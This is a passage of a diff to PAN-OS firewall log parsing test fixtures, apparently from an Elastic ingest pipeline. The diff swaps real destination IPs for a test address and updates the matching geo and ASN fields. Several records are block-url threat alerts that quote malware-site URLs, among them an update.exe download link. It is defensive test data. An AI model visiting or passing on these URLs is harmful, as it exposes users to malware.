"country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4067,7 +4041,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4109,7 +4083,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NwAT+gtzMjRwKS71Tn+YaKwyOvI=", + "community_id": "1:SXzPelGxF8TuDIbRbwKvR0ebxPA=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4146,14 +4120,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545533728Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079170300Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4176,26 +4150,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4211,7 +4184,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4253,7 +4226,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mTTbk9h6Dgx6lH3l4aEHguufZVE=", + "community_id": "1:susDkHpBXaMVE4YOqEBbFKp9r00=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4290,14 +4263,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545540823Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079175300Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4320,26 +4293,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4355,7 +4327,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4397,7 +4369,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=", + "community_id": "1:iXmhRxdINxEmOXTjxHfTv8gVn1o=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4434,14 +4406,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545547868Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079181100Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4464,26 +4436,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4499,7 +4470,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4541,7 +4512,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VLKKVfau50s2qjTDcucU+VKCAqY=", + "community_id": "1:B6oxpQQYa0rsyW55IuJO81SLmqQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4578,14 +4549,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545555073Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079187Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4608,26 +4579,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4643,7 +4613,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4685,7 +4655,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jAvA0C85T0GFKryKA312lLEtKIM=", + "community_id": "1:i77fJfEDsnltkr5Ib1/ISaydfdg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4722,14 +4692,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545562424Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079192800Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4752,23 +4722,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 22489, + "number": 4837, "organization": { - "name": "Castle Access Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "69.43.161.167" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4784,7 +4756,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -4825,7 +4797,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Jqiwb/u74kolY3Y1yGkp+oMAxT4=", + "community_id": "1:IJvQ8uQdf8IMfv+pa7ougp18GvM=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4861,14 +4833,14 @@ ], "ip": [ "192.168.0.2", - "69.43.161.167", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545569520Z", - "original": "Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079214800Z", + "original": "Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4892,22 +4864,24 @@ "nat": {}, "geo": { "continent_name": "Asia", - "country_name": "South Korea", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Korea Republic Of", + "region_name": "Jilin", "location": { - "lon": 126.9741, - "lat": 37.5112 - }, - "country_iso_code": "KR" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 17848, + "number": 4837, "organization": { - "name": "INAMES" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "202.31.187.154" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4923,7 +4897,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", "panw": { "panos": { "ruleset": "rule1", @@ -4964,7 +4938,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:q84mXt2kLt843wk0Y5vtvJwq+bc=", + "community_id": "1:q2pcfpZcAPG71w/ewi9qWbP1iPo=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5000,14 +4974,14 @@ ], "ip": [ "192.168.0.2", - "202.31.187.154", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545576669Z", - "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", + "ingested": "2021-12-09T13:42:59.079220900Z", + "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5030,23 +5004,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 41126, + "number": 4837, "organization": { - "name": "CJSC Registrar R01" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "89.111.176.67" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5062,7 +5038,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5103,7 +5079,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1jDSU+BTdTOAQSrWGRbSjxehwNg=", + "community_id": "1:nE+H7Z778BIW5nL9ViBz57RhPQI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5139,14 +5115,14 @@ ], "ip": [ "192.168.0.2", - "89.111.176.67", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545584007Z", - "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079226800Z", + "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5169,26 +5145,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5204,7 +5179,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5245,7 +5220,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vGp9HpobYZmzzLGyDAG6oVAe4dg=", + "community_id": "1:g3JhDl3Gkv1JmUHYgub2bB0hWK4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5281,14 +5256,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545591186Z", - "original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079232700Z", + "original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5311,23 +5286,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5343,7 +5320,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 